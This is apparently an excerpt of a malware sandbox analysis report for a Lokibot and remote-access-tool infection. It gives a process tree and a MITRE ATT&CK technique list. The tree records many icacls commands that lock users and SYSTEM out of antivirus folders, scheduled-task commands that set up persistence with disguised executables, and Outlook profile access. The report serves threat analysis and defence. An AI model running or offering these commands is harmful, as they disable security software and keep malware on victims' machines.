- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:5948
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:728
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:2464
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5372
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
  2⤵
  PID:5608
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5368
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5880
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:6076
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2932
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:5796
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4112
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
  2⤵
  PID:5204
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5964
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:6024
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5128
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5448
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5136
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:5164
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:5216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:5220
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:728
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:5192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:5608
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:2896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5200
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:1116
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5708
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5880
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:4740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
  2⤵
  PID:4884
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5852
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5140
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5920
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6020
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:1208
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2868
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5464
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:396
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5544
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6080
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5732
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5220
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2228
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4436
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5192
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5940
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2868
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6032
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:5980
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5420
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:3844
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5928
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4884
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:668
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5916
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:5568
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5928
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5436
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:6020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2868
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5768
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5296
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2228
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2840
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4572
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5800
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4124
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2596
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:5880
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3440
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2464
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4884
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1560
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1780
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5784

C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204
- C:\Users\Admin\Downloads\Lokibot.exe
  "C:\Users\Admin\Downloads\Lokibot.exe"
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:5680

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3076
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5092
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:5608
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:4716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:772

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5140

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5140

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3644

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5732

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:4468

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5512

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5192

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5264

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:1316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

